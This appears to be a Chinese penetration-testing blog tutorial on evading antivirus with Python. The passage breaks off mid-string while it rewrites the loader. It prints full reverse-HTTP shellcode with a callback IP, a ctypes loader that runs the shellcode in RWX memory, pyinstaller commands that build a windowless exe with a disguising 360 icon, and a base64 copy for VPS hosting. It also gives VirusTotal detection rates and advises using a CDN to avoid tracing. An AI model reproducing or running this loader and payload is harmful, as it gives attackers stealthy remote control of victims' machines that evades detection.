【渗透测试笔记】之【Python免杀——两行代码实现免杀！VT查杀率：10/68（思路：将ShellCode和Loader一起分离免杀）】

文章目录

• 1. shellcode Loader
• • 1.1 生成shellcode
  • 1.2 shellcode loader 脚本上线测试
  • 1.3 使用pyinstaller生成exe文件上线测试
  • 1.4 VT查杀率：24/68
• 2. ShellCode 分离
• • 2.1 上传加密后的shellcode
  • 2.2 改写shellcode loader
  • 2.3 shellcode 分离后shellcode loader脚本上线测试
  • 2.4 shellcode 分离后，使用pyinstaller生成exe文件上线测试
  • 2.5 VT查杀率：14/67
• 3. ShellCode 及ShellCoder 的分离
• • 3.1 改写shellcode loader
  • 3.2 shellcode和shellcode loader均分离后，两行代码的脚本上线测试
  • 3.3 使用pyinstaller生成exe文件上线测试
  • 3.4 VT查杀率：10/68

1. shellcode Loader 1.1 生成shellcode

生成py类型的payload：


得到shellcode：

buf = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8xb3x15x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx4fx6cx69x39x00xeaxf8x43x38x93xe8x36x73xcex2fx3bx08x6fxa9x7ex11xdcx18xf8x71x43xe2x0fx92xd7x3exd6xacxfcxabx59x15xd9xdcx48x2cx76xc9x3cx19x77xbex4fx57xbfxe0x17xfbx7bx1fx0fxd5xc3x89x12x37x8bxe7x37x80xd8x2cx96x7cxb8x08x0exf1x37x48x15x9exa8x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x29x0dx0ax00x67x8dx04x19x98x95x99x3dx2fx9ex37xabx27x74x98xe8xc9x1ex06xcex89x67xcdx7dx63xb1x88x6fxdcxeex0fxf2x32xa0xf4x0exf6xcfxc5x60x0cx1dxcbx29xfcxd7xc2xfaxbax59xdfx1ax04xd3xc5x20xcdxedx18x6exe9xa1xe8xadxa7x7fxf2x97xabx8bx54x19xe3x85x19x80x33x88xf1x68x54x7axcbx8bxf1x5exf9x80x59xd1x4dx4ex41x0axccxe0x3bx5axb4x50x30xbexc0xa5xa3x74xbfx36xbbxc5xeex1cx1ax3cx25xb0x0ex78xa7xa9x6dx16xcex32x17x7bx9cx0dx44x5ex3exc5x7dx7cxbaxb0x83x34x31xcdxccx11xf8x78x64x4dxe5x93x0dx7dxcexacx63x6fx06x42x0dx18xa2x5ex01xb3x87xcdx1dx8exd4x0bx19xe8xd7xcax9fx83xaaxa8x4bx75x45x62x93x55xf2x2cxb7xe9x2fxd8x78x38x64x21xbdx5exebx11xd3x38xaax1fx5cx34xd4x04x8cxecx18x44x5fx46x40x65x5bx67xecxd1x39x66x9dx89x9cx47xdex9exe9x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex38x2ex34x38x00x19x69xa0x8d"

1.2 shellcode loader 脚本上线测试

将生成的payload复制到此加载器：

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time    : 2021/10/24 15:32
# @Author  : AA8j
# @Site    : 
# @File    : Loader2.py
# @Software: PyCharm
# @Blog    : https://blog.csdn.net/qq_44874645
import ctypes

shellcode = b"xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8xb3x15x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx4fx6cx69x39x00xeaxf8x43x38x93xe8x36x73xcex2fx3bx08x6fxa9x7ex11xdcx18xf8x71x43xe2x0fx92xd7x3exd6xacxfcxabx59x15xd9xdcx48x2cx76xc9x3cx19x77xbex4fx57xbfxe0x17xfbx7bx1fx0fxd5xc3x89x12x37x8bxe7x37x80xd8x2cx96x7cxb8x08x0exf1x37x48x15x9exa8x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x29x0dx0ax00x67x8dx04x19x98x95x99x3dx2fx9ex37xabx27x74x98xe8xc9x1ex06xcex89x67xcdx7dx63xb1x88x6fxdcxeex0fxf2x32xa0xf4x0exf6xcfxc5x60x0cx1dxcbx29xfcxd7xc2xfaxbax59xdfx1ax04xd3xc5x20xcdxedx18x6exe9xa1xe8xadxa7x7fxf2x97xabx8bx54x19xe3x85x19x80x33x88xf1x68x54x7axcbx8bxf1x5exf9x80x59xd1x4dx4ex41x0axccxe0x3bx5axb4x50x30xbexc0xa5xa3x74xbfx36xbbxc5xeex1cx1ax3cx25xb0x0ex78xa7xa9x6dx16xcex32x17x7bx9cx0dx44x5ex3exc5x7dx7cxbaxb0x83x34x31xcdxccx11xf8x78x64x4dxe5x93x0dx7dxcexacx63x6fx06x42x0dx18xa2x5ex01xb3x87xcdx1dx8exd4x0bx19xe8xd7xcax9fx83xaaxa8x4bx75x45x62x93x55xf2x2cxb7xe9x2fxd8x78x38x64x21xbdx5exebx11xd3x38xaax1fx5cx34xd4x04x8cxecx18x44x5fx46x40x65x5bx67xecxd1x39x66x9dx89x9cx47xdex9exe9x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex38x2ex34x38x00x19x69xa0x8d"
# CS生成的ShellCode
shellcode = bytearray(shellcode)

"""
【设置返回类型】
我们需要用VirtualAlloc函数来申请内存，返回类型必须和系统位数相同
想在64位系统上运行，必须使用restype函数设置VirtualAlloc返回类型为ctypes.c_unit64，否则默认的是 32 位
"""
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

"""
【申请内存】
ctypes.c_int(0)                 :是NULL，系统将会决定分配内存区域的位置，并且按64KB向上取整
ctypes.c_int(len(shellcode))    :以字节为单位分配或者保留多大区域
ctypes.c_int(0x3000)            :是 MEM_COMMIT(0x1000) 和 MEM_RESERVE(0x2000)类型的合并
ctypes.c_int(0x40)              :是权限为PAGE_EXECUTE_READWRITE 该区域可以执行代码，应用程序可以读写该区域。
"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

"""
【放入shellcode】
从指定内存地址将内容复制到我们申请的内存中去，shellcode字节多大就复制多大
"""
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
    ctypes.c_uint64(ptr),
    buf,
    ctypes.c_int(len(shellcode))
)

"""
【创建一个线程从shellcode放置位置开始执行】
lpThreadAttributes  :为NULL使用默认安全性
dwStackSize         :为0，默认将使用与调用该函数的线程相同的栈空间大小   
lpStartAddress      :为ctypes.c_uint64(ptr)，定位到申请的内存所在的位置 
lpParameter         :不需传递参数时为NULL
dwCreationFlags     :属性为0，表示创建后立即激活
lpThreadId          :为ctypes.pointer(ctypes.c_int(0))不想返回线程ID,设置值为NULL
"""
handle = ctypes.windll.kernel32.CreateThread(
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.c_uint64(ptr),
    ctypes.c_int(0),
    ctypes.c_int(0),
    ctypes.pointer(ctypes.c_int(0))
)


"""
【等待线程结束】
这里两个参数，一个是创建的线程，一个是等待时间
当线程退出时会给出一个信号，函数收到后会结束程序。
当时间设置为0或超过等待时间，程序也会结束，所以线程也会跟着结束。
正常的话我们创建的线程是需要一直运行的，所以将时间设为负数，等待时间将成为无限等待，程序就不会结束。
"""
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

靶机使用python运行，成功上线：

1.3 使用pyinstaller生成exe文件上线测试

使用pyinstaller生成exe文件：

pyinstaller -w -F Loader2.py -i 360.ico -n test.exe

pyinstaller参数说明：

-F，-onefile	产生单个的可执行文件
-D，--onedir	产生一个目录（包含多个文件）作为可执行程序
-a，--ascii	不包含 Unicode 字符集支持
-d，--debug	产生 debug 版本的可执行文件
-w，--windowed，--noconsolc	指定程序运行时不显示命令行窗口（仅对 Windows 有效）
-c，--nowindowed，--console	指定使用命令行窗口运行程序（仅对 Windows 有效）
-o DIR，--out=DIR	指定 spec 文件的生成目录。如果没有指定，则默认使用当前目录来生成 spec 文件
-p DIR，--path=DIR	设置 Python 导入模块的路径（和设置 PYTHonPATH 环境变量的作用相似）。也可使用路径分隔符（Windows 使用分号，Linux 使用冒号）来分隔多个路径
-n NAME，--name=NAME	指定项目（产生的 spec）名字。如果省略该选项，那么第一个脚本的主文件名将作为 spec 的名字

双击测试能否上线：
成功上线：

1.4 VT查杀率：24/68

360还是能轻松过的：

2. ShellCode 分离 2.1 上传加密后的shellcode

将ShellCode使用base64加密存放到vps上可供访问：
shellcode（注意格式为b"shellcode"）：

b"xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8xb3x15x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx4fx6cx69x39x00xeaxf8x43x38x93xe8x36x73xcex2fx3bx08x6fxa9x7ex11xdcx18xf8x71x43xe2x0fx92xd7x3exd6xacxfcxabx59x15xd9xdcx48x2cx76xc9x3cx19x77xbex4fx57xbfxe0x17xfbx7bx1fx0fxd5xc3x89x12x37x8bxe7x37x80xd8x2cx96x7cxb8x08x0exf1x37x48x15x9exa8x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x29x0dx0ax00x67x8dx04x19x98x95x99x3dx2fx9ex37xabx27x74x98xe8xc9x1ex06xcex89x67xcdx7dx63xb1x88x6fxdcxeex0fxf2x32xa0xf4x0exf6xcfxc5x60x0cx1dxcbx29xfcxd7xc2xfaxbax59xdfx1ax04xd3xc5x20xcdxedx18x6exe9xa1xe8xadxa7x7fxf2x97xabx8bx54x19xe3x85x19x80x33x88xf1x68x54x7axcbx8bxf1x5exf9x80x59xd1x4dx4ex41x0axccxe0x3bx5axb4x50x30xbexc0xa5xa3x74xbfx36xbbxc5xeex1cx1ax3cx25xb0x0ex78xa7xa9x6dx16xcex32x17x7bx9cx0dx44x5ex3exc5x7dx7cxbaxb0x83x34x31xcdxccx11xf8x78x64x4dxe5x93x0dx7dxcexacx63x6fx06x42x0dx18xa2x5ex01xb3x87xcdx1dx8exd4x0bx19xe8xd7xcax9fx83xaaxa8x4bx75x45x62x93x55xf2x2cxb7xe9x2fxd8x78x38x64x21xbdx5exebx11xd3x38xaax1fx5cx34xd4x04x8cxecx18x44x5fx46x40x65x5bx67xecxd1x39x66x9dx89x9cx47xdex9exe9x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex38x2ex34x38x00x19x69xa0x8d"

base64加密结果（在线加密网站：https://www.sojson.com/base64.html）：

YiJceGZjXHg0OFx4ODNceGU0XHhmMFx4ZThceGM4XHgwMFx4MDBceDAwXHg0MVx4NTFceDQxXHg1MFx4NTJceDUxXHg1Nlx4NDhceDMxXHhkMlx4NjVceDQ4XHg4Ylx4NTJceDYwXHg0OFx4OGJceDUyXHgxOFx4NDhceDhiXHg1Mlx4MjBceDQ4XHg4Ylx4NzJceDUwXHg0OFx4MGZceGI3XHg0YVx4NGFceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHgzY1x4NjFceDdjXHgwMlx4MmNceDIwXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4ZTJceGVkXHg1Mlx4NDFceDUxXHg0OFx4OGJceDUyXHgyMFx4OGJceDQyXHgzY1x4NDhceDAxXHhkMFx4NjZceDgxXHg3OFx4MThceDBiXHgwMlx4NzVceDcyXHg4Ylx4ODBceDg4XHgwMFx4MDBceDAwXHg0OFx4ODVceGMwXHg3NFx4NjdceDQ4XHgwMVx4ZDBceDUwXHg4Ylx4NDhceDE4XHg0NFx4OGJceDQwXHgyMFx4NDlceDAxXHhkMFx4ZTNceDU2XHg0OFx4ZmZceGM5XHg0MVx4OGJceDM0XHg4OFx4NDhceDAxXHhkNlx4NGRceDMxXHhjOVx4NDhceDMxXHhjMFx4YWNceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHgzOFx4ZTBceDc1XHhmMVx4NGNceDAzXHg0Y1x4MjRceDA4XHg0NVx4MzlceGQxXHg3NVx4ZDhceDU4XHg0NFx4OGJceDQwXHgyNFx4NDlceDAxXHhkMFx4NjZceDQxXHg4Ylx4MGNceDQ4XHg0NFx4OGJceDQwXHgxY1x4NDlceDAxXHhkMFx4NDFceDhiXHgwNFx4ODhceDQ4XHgwMVx4ZDBceDQxXHg1OFx4NDFceDU4XHg1ZVx4NTlceDVhXHg0MVx4NThceDQxXHg1OVx4NDFceDVhXHg0OFx4ODNceGVjXHgyMFx4NDFceDUyXHhmZlx4ZTBceDU4XHg0MVx4NTlceDVhXHg0OFx4OGJceDEyXHhlOVx4NGZceGZmXHhmZlx4ZmZceDVkXHg2YVx4MDBceDQ5XHhiZVx4NzdceDY5XHg2ZVx4NjlceDZlXHg2NVx4NzRceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDRjXHg4OVx4ZjFceDQxXHhiYVx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4NDhceDMxXHhjOVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NDFceDUwXHg0MVx4NTBceDQxXHhiYVx4M2FceDU2XHg3OVx4YTdceGZmXHhkNVx4ZWJceDczXHg1YVx4NDhceDg5XHhjMVx4NDFceGI4XHhiM1x4MTVceDAwXHgwMFx4NGRceDMxXHhjOVx4NDFceDUxXHg0MVx4NTFceDZhXHgwM1x4NDFceDUxXHg0MVx4YmFceDU3XHg4OVx4OWZceGM2XHhmZlx4ZDVceGViXHg1OVx4NWJceDQ4XHg4OVx4YzFceDQ4XHgzMVx4ZDJceDQ5XHg4OVx4ZDhceDRkXHgzMVx4YzlceDUyXHg2OFx4MDBceDAyXHg0MFx4ODRceDUyXHg1Mlx4NDFceGJhXHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg0OFx4ODlceGM2XHg0OFx4ODNceGMzXHg1MFx4NmFceDBhXHg1Zlx4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDlceGM3XHhjMFx4ZmZceGZmXHhmZlx4ZmZceDRkXHgzMVx4YzlceDUyXHg1Mlx4NDFceGJhXHgyZFx4MDZceDE4XHg3Ylx4ZmZceGQ1XHg4NVx4YzBceDBmXHg4NVx4OWRceDAxXHgwMFx4MDBceDQ4XHhmZlx4Y2ZceDBmXHg4NFx4OGNceDAxXHgwMFx4MDBceGViXHhkM1x4ZTlceGU0XHgwMVx4MDBceDAwXHhlOFx4YTJceGZmXHhmZlx4ZmZceDJmXHg0Zlx4NmNceDY5XHgzOVx4MDBceGVhXHhmOFx4NDNceDM4XHg5M1x4ZThceDM2XHg3M1x4Y2VceDJmXHgzYlx4MDhceDZmXHhhOVx4N2VceDExXHhkY1x4MThceGY4XHg3MVx4NDNceGUyXHgwZlx4OTJceGQ3XHgzZVx4ZDZceGFjXHhmY1x4YWJceDU5XHgxNVx4ZDlceGRjXHg0OFx4MmNceDc2XHhjOVx4M2NceDE5XHg3N1x4YmVceDRmXHg1N1x4YmZceGUwXHgxN1x4ZmJceDdiXHgxZlx4MGZceGQ1XHhjM1x4ODlceDEyXHgzN1x4OGJceGU3XHgzN1x4ODBceGQ4XHgyY1x4OTZceDdjXHhiOFx4MDhceDBlXHhmMVx4MzdceDQ4XHgxNVx4OWVceGE4XHgwMFx4NTVceDczXHg2NVx4NzJceDJkXHg0MVx4NjdceDY1XHg2ZVx4NzRceDNhXHgyMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNFx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzdceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM1XHgyZVx4MzFceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNFx4MmVceDMwXHgyOVx4MGRceDBhXHgwMFx4NjdceDhkXHgwNFx4MTlceDk4XHg5NVx4OTlceDNkXHgyZlx4OWVceDM3XHhhYlx4MjdceDc0XHg5OFx4ZThceGM5XHgxZVx4MDZceGNlXHg4OVx4NjdceGNkXHg3ZFx4NjNceGIxXHg4OFx4NmZceGRjXHhlZVx4MGZceGYyXHgzMlx4YTBceGY0XHgwZVx4ZjZceGNmXHhjNVx4NjBceDBjXHgxZFx4Y2JceDI5XHhmY1x4ZDdceGMyXHhmYVx4YmFceDU5XHhkZlx4MWFceDA0XHhkM1x4YzVceDIwXHhjZFx4ZWRceDE4XHg2ZVx4ZTlceGExXHhlOFx4YWRceGE3XHg3Zlx4ZjJceDk3XHhhYlx4OGJceDU0XHgxOVx4ZTNceDg1XHgxOVx4ODBceDMzXHg4OFx4ZjFceDY4XHg1NFx4N2FceGNiXHg4Ylx4ZjFceDVlXHhmOVx4ODBceDU5XHhkMVx4NGRceDRlXHg0MVx4MGFceGNjXHhlMFx4M2JceDVhXHhiNFx4NTBceDMwXHhiZVx4YzBceGE1XHhhM1x4NzRceGJmXHgzNlx4YmJceGM1XHhlZVx4MWNceDFhXHgzY1x4MjVceGIwXHgwZVx4NzhceGE3XHhhOVx4NmRceDE2XHhjZVx4MzJceDE3XHg3Ylx4OWNceDBkXHg0NFx4NWVceDNlXHhjNVx4N2RceDdjXHhiYVx4YjBceDgzXHgzNFx4MzFceGNkXHhjY1x4MTFceGY4XHg3OFx4NjRceDRkXHhlNVx4OTNceDBkXHg3ZFx4Y2VceGFjXHg2M1x4NmZceDA2XHg0Mlx4MGRceDE4XHhhMlx4NWVceDAxXHhiM1x4ODdceGNkXHgxZFx4OGVceGQ0XHgwYlx4MTlceGU4XHhkN1x4Y2FceDlmXHg4M1x4YWFceGE4XHg0Ylx4NzVceDQ1XHg2Mlx4OTNceDU1XHhmMlx4MmNceGI3XHhlOVx4MmZceGQ4XHg3OFx4MzhceDY0XHgyMVx4YmRceDVlXHhlYlx4MTFceGQzXHgzOFx4YWFceDFmXHg1Y1x4MzRceGQ0XHgwNFx4OGNceGVjXHgxOFx4NDRceDVmXHg0Nlx4NDBceDY1XHg1Ylx4NjdceGVjXHhkMVx4MzlceDY2XHg5ZFx4ODlceDljXHg0N1x4ZGVceDllXHhlOVx4MDBceDQxXHhiZVx4ZjBceGI1XHhhMlx4NTZceGZmXHhkNVx4NDhceDMxXHhjOVx4YmFceDAwXHgwMFx4NDBceDAwXHg0MVx4YjhceDAwXHgxMFx4MDBceDAwXHg0MVx4YjlceDQwXHgwMFx4MDBceDAwXHg0MVx4YmFceDU4XHhhNFx4NTNceGU1XHhmZlx4ZDVceDQ4XHg5M1x4NTNceDUzXHg0OFx4ODlceGU3XHg0OFx4ODlceGYxXHg0OFx4ODlceGRhXHg0MVx4YjhceDAwXHgyMFx4MDBceDAwXHg0OVx4ODlceGY5XHg0MVx4YmFceDEyXHg5Nlx4ODlceGUyXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDIwXHg4NVx4YzBceDc0XHhiNlx4NjZceDhiXHgwN1x4NDhceDAxXHhjM1x4ODVceGMwXHg3NVx4ZDdceDU4XHg1OFx4NThceDQ4XHgwNVx4MDBceDAwXHgwMFx4MDBceDUwXHhjM1x4ZThceDlmXHhmZFx4ZmZceGZmXHgzMVx4MzlceDMyXHgyZVx4MzFceDM2XHgzOFx4MmVceDM4XHgyZVx4MzRceDM4XHgwMFx4MTlceDY5XHhhMFx4OGQi

上传vps：

访问测试（域名最好做CDN，防溯源）：

2.2 改写shellcode loader

改写shellcode Loadder：

将前面的

shellcode = b"xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8xb3x15x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx4fx6cx69x39x00xeaxf8x43x38x93xe8x36x73xcex2fx3bx08x6fxa9x7ex11xdcx18xf8x71x43xe2x0fx92xd7x3exd6xacxfcxabx59x15xd9xdcx48x2cx76xc9x3cx19x77xbex4fx57xbfxe0x17xfbx7bx1fx0fxd5xc3x89x12x37x8bxe7x37x80xd8x2cx96x7cxb8x08x0exf1x37x48x15x9exa8x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x37x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x35x2ex31x3bx20x54x72x69x64x65x6ex74x2fx34x2ex30x29x0dx0ax00x67x8dx04x19x98x95x99x3dx2fx9ex37xabx27x74x98xe8xc9x1ex06xcex89x67xcdx7dx63xb1x88x6fxdcxeex0fxf2x32xa0xf4x0exf6xcfxc5x60x0cx1dxcbx29xfcxd7xc2xfaxbax59xdfx1ax04xd3xc5x20xcdxedx18x6exe9xa1xe8xadxa7x7fxf2x97xabx8bx54x19xe3x85x19x80x33x88xf1x68x54x7axcbx8bxf1x5exf9x80x59xd1x4dx4ex41x0axccxe0x3bx5axb4x50x30xbexc0xa5xa3x74xbfx36xbbxc5xeex1cx1ax3cx25xb0x0ex78xa7xa9x6dx16xcex32x17x7bx9cx0dx44x5